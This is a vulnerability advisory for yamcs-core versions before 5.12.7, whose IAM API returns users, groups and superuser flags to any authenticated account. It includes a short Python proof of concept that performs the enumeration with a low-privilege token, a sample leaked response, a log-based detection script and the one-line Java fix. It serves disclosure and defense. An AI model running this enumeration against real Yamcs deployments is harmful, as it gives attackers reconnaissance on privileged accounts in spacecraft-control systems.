Severity: MEDIUM (CVSS 4.3)
Affected: yamcs-core < 5.12.7
Fixed in: yamcs-core 5.12.7
Advisory: GHSA-p2rj-mrmc-9w29

YAMCS has an IAM system with privilege levels. One of them, SystemPrivilege.ControlAccess, is supposed to gate access to the user-management endpoints. The IAM API has endpoints for listing users, getting user details and listing groups. All of them should require ControlAccess. None of them actually checked for it.

The issue

These endpoints return full user data to any authenticated user, regardless of privilege level:

GET /api/iam/users
GET /api/iam/users/{name}
GET /api/iam/groups
GET /api/iam/groups/{name}

Authenticate as a low-privilege operator account, call /api/iam/users, get this back:

{
  "users": [
    { "name": "admin", "superuser": true, "identities": [{ "provider": "ldap" }] },
    { "name": "operator", "superuser": false },
    { "name": "guest", "superuser": false }
  ]
}

With one request we get the full user map, the superuser flags and the auth provider behind each account.

Reproduction

import requests

# Obtain a token for a low-privilege account (one without ControlAccess).
resp = requests.post("http://localhost:8090/auth/token", data={
    "grant_type": "password",
    "username": "operator",
    "password": "operator"
})
token = resp.json()["access_token"]

# Call the user-listing endpoint with that token.
resp = requests.get(
    "http://localhost:8090/api/iam/users",
    headers={"Authorization": f"Bearer {token}"}
)
print(resp.status_code)  # 200 on affected versions; should be 403
print(resp.json())       # full user list

Why it matters

User enumeration on its own is low severity. In context it’s more useful because you know exactly which accounts are superusers, which auth provider they use, and what the group structure looks like. Useful reconnaissance before going further.

In a mission control environment where YAMCS manages spacecraft commanding access, that information shouldn’t be available to anyone with a guest account.
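As an added example (not code from the advisory or from the Yamcs project), a defender-side check that runs over HTTP access-log lines and flags reads of the four affected IAM endpoints that were answered 200 to an account not expected to hold ControlAccess; on a patched server those requests get 403, so a 200 means the enumeration actually succeeded. The log line format, the ControlAccess allowlist and the sample lines are assumptions constructed for this snippet.

```python
import re
from typing import List, Dict

# The endpoints the advisory says lacked the ControlAccess check;
# the {name} segment is matched generically.
IAM_ENDPOINTS = re.compile(r"^/api/iam/(users|groups)(/[^/?]+)?(\?.*)?$")

# Accounts expected to hold SystemPrivilege.ControlAccess. This allowlist
# is an assumption; fill it from your own deployment's security config.
CONTROL_ACCESS_USERS = {"admin"}

# Access-log format assumed here (constructed, not Yamcs' real format):
#   <iso-timestamp> <client-ip> <user> "<METHOD> <path> HTTP/1.1" <status>
LOG_LINE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) (?P<user>\S+) '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})$'
)

def flag_iam_enumeration(lines: List[str]) -> List[Dict[str, str]]:
    """Return hits for IAM reads answered 200 to a user without ControlAccess."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # skip lines that don't fit the assumed format
        if m["method"] != "GET" or not IAM_ENDPOINTS.match(m["path"]):
            continue
        if m["user"] in CONTROL_ACCESS_USERS:
            continue  # privileged caller, a 200 is expected
        if m["status"] == "200":
            hits.append({"ts": m["ts"], "ip": m["ip"],
                         "user": m["user"], "path": m["path"]})
    return hits

# Constructed sample lines so the check runs offline.
SAMPLE_LOG = [
    '2026-03-01T10:00:01Z 10.0.0.5 admin "GET /api/iam/users HTTP/1.1" 200',
    '2026-03-01T10:00:07Z 10.0.0.9 operator "GET /api/iam/users HTTP/1.1" 200',
    '2026-03-01T10:00:08Z 10.0.0.9 operator "GET /api/iam/groups/ops HTTP/1.1" 200',
    '2026-03-01T10:00:09Z 10.0.0.9 operator "GET /api/iam/users/admin HTTP/1.1" 403',
    '2026-03-01T10:00:12Z 10.0.0.9 operator "GET /api/archive/yamcs/tables HTTP/1.1" 200',
]

if __name__ == "__main__":
    for hit in flag_iam_enumeration(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['user']}@{hit['ip']} read {hit['path']} without ControlAccess")
```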

Root cause

The SystemPrivilege.ControlAccess check was missing from the listUsers, getUser, listGroups and getGroup handlers in IamApi.java. The privilege system exists and works; it just wasn't called in these specific methods.

The fixed version of listUsers looks like this:

@Override
public void listUsers(Context ctx, Empty request, Observer<ListUsersResponse> observer) {
    ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess); // added in 5.12.7
    SecurityStore securityStore = YamcsServer.getServer().getSecurityStore();
    Directory directory = securityStore.getDirectory();
    List<User> users = directory.getUsers();
    // ...
}

One line. ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess) throws HTTP 403 if the caller doesn't have the required privilege. A simple and correct fix.

The fix (yamcs-core 5.12.7)

ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess) is added at the top of every affected handler.

PoC

github.com/ex-cal1bur/CVE-2026-44595

https://www.exploit-db.com/exploits/52604

Daniel Miranda Barcelona (Excal1bur) — GitHub · LinkedIn · thedumpster · portfolio